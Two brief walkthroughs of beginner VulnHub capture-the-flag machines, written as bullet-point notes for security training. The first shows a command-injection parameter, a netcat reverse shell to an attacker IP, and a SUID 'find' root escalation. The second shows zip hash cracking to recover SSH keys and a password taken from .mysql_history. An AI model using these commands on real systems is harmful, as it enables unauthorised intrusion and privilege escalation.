Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF's. It should take around 30 minutes to root.

enum

• nmap
• ssh + http; not much else to be seen here
• webpage enumerate: robots.txt, index html source
• find directory via index source (html comment)

exploit

• it appears that the original developer wanted to ping via a web service on the server
• try common terms used for this e.g ?command= or ?exec=
• ?cmd=id works; also looks like we have nc (which nc)
• listener: rlwrap ncat -nlvp $PORT
• reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT
• we're in with user www-data
• grab user flag

privesc

• spawn a tty (we have python): python -c 'import pty; pty.spawn("/bin/sh")'
• look for SUID binaries: find / -user root -perm -4000 -print 2>/dev/null
• notable binaries: grep and find
• both have entries on gtfobins
• use find to spawn a root shell:

find . -exec /bin/sh -p \; -quit

• grab root flag

#vulnhub #php #suid

Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.

enumeration

• nmap
• find anon ftp access
• get all zip files – they contain id_rsa keys but are password protected

initial access

• use /usr/sbin/zip2john to get hashes of all zip files
• use john to crack these hashes using your favourite wordlist
• user tom's zip file could be successfully cracked
• extract id_rsa with password
• chmod 600 id_rsa && ssh -i id_rsa $VulnHubIP -v
• we're in 🔓
• grab local.txt

privesc

• sudo -l – prompted for tom's password which we don't have yet
• check all files in directory ls -la
• investigate .bash_history and .mysql_history
• looks like we see a password in mysql history
• we have excessive sudo privileges
• sudo su -l and grab proof.txt 🔚

#vulnhub #ssh #sudo